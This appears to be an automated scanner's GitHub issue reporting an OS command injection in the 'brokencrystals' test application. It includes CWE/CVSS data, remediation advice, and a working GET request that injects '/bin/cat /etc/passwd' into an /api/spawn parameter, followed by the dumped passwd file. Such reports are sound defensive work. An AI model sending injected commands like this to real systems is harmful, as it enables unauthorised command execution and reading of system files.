Skip to content

OS Command Injection #8

Description

@bright-security

OS Command Injection

Severity: High Discovered: 10 of October-2022, 11:11 PM

CWE ID

CWE-78

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Details

During Command Injection (or OS Command Injection) the software that constructs a system command using externally influenced input does not properly neutralize the input from special elements that are able to modify the initially intended command.
OS Command injection occurred while injecting token "/bin/cat /etc/passwd" into parameter "" in the URL.
Original URL:
https://brokencrystals.com/api/spawn?command=pwd
Modified URL:
https://brokencrystals.com/api/spawn?command=%2Fbin%2Fcat+%2Fetc%2Fpasswd
Detected system is:
• Unix

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

Assume all input is malicious. Use an 'accept known good' input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, 'boat' may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as 'red' or 'blue.' Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Request

GET https://brokencrystals.com/api/spawn?command=%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443505238; connect.sid=qFO0ZOMlZencdpy27U_xrZ6KoaLyhAnP.XB9vcn0WrfGI38v1HWvCVWZdmpRqFnTJqFVZWUBpSjg
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:11:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 965
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443505991
Cache-Control: public, max-age=99999

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions